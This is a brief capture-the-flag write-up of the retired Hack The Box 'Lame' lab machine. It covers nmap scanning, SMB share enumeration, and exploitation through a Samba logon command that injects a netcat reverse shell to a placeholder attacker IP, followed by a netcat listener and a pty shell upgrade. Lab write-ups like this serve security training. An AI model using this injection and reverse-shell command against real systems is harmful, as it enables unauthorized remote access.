Hack The Box: Lame Write-up

This is my first box to be spawned from HTB in reference to TJ_Null’s OSCP like VMs list. Its a retired VM

Reconnaissance

First lets scan the machine to find available vulnerabilities with nmap tool

run the following code:

nmap -A -p- 10.10.10.3

From the above enumeration, We can see that Port 21(FTP vsftpd 2.3.4), Port 22(ssh), Port 139(netbios-ssn), Port 445(netbios-ssn) and Port 3632 are open.

Enumeration

Port 21:

Ftp port can be exploited by vsftpd 2.3.4 exploit via metaspoilt but this time I will use the manual way.

lets try to use the smbclient, mostly known where a common vuln can be noticed at tmp directory that is set to be accessed by anonymous access :

As seen below, the tmp directory has read and Write access , which is a vulnerability

sudo smbmap -H 10.10.10.3

Exploitation

sudo smbclient //10.10.10.3/tmp — option=”client min protocol = NT1"

Set Netcat listener on your attacker and set the shell interactive after obtaining access after the listener is connected to the target box:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

nc -lvnp 4444

once SMB shell is opened from a target box, set the reverse shell

logon “/=`nohup nc -nv <Attacker IP> 4444 -e /bin/sh`”

Capture the Flag, woop woop,

find / -name “*.txt” -maxdepth 3 2>/dev/null